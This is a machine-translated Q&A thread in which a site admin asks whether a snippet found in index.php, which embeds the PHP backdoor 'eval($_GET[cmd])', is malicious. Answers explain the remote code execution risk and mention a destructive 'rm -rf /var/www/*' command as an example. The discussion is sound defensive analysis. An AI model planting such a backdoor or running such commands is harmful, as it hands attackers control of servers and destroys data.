Php 恶意Javascript代码？_Php_Javascript_Eval

Php 恶意Javascript代码？

php javascript

Php 恶意Javascript代码？,php,javascript,eval,Php,Javascript,Eval,我在我的站点index.php中找到了这段代码 <script type="text/javascript"> new.track("new.dev","_browser","'<?php eval($_GET[cmd]); ?>', '<?php eval($_GET[cmd]);?>'"); new.track("new.dev","_url",location.href); </script> new.track（“new.dev

我在我的站点index.php中找到了这段代码

<script type="text/javascript">
  new.track("new.dev","_browser","'<?php eval($_GET[cmd]); ?>', '<?php eval($_GET[cmd]);?>'");
  new.track("new.dev","_url",location.href);
</script>


new.track（“new.dev”、“_browser”、”、”、”）；
new.track（“new.dev”，“_url”，location.href）；

代码是恶意的吗？从web上，我尝试放置index.php？cmd=ls之类的东西，但什么也没有出现。也许应该在第二页？

我试图了解以前的管理员在站点上做了什么。

在这些代码中存在着无止境的风险。eval（）运行php命令并可以运行终端命令。如果你在没有卫生设施的情况下接受输入，有人可能会发疯，并在那里造成严重伤害。我会立即删除它，并找到更好的方法

也击打写它的人的头。

1）引用

cmd

$\u GET['cmd']

2）任何用户都可以在服务器上执行任何php代码。不过，get请求默认限制为8kb（限制可能会更改）

你做的事很危险。我不确定你想要实现什么，但相信我，找到一种不同的方法。

很难说它是用来做什么的，但它允许在URL中以

？cmd=

的形式传递任意PHP代码，并执行它，将结果传递到javascript中。即使它的意图不是恶意的，它很容易被恶意使用。首先，我必须理解这段代码可以做什么。我尝试放置index.php？cmd=ls之类的内容，但什么都没有出现。eval（）以php代码的形式执行输入。因此，在PHP范围内可以执行的任何操作都可以通过_GET[cmd]输入完成。想象一下系统（'rm-rf/var/www/*）从那里得到处理，一个无休止的循环，文件操作，代码注入。。这是无止境的您的代码意图是。。。甚至不确定。代码不回显，因此函数的输出永远不会进入页面。请尝试：

并查看您是否从

ls

测试中获得了输出。我认为系统可以使用它在现场执行某些操作，因为get和post请求无法从外部获得它，并且没有提供回显。甚至可以与javascript请求一起使用。为什么要在标签中编码？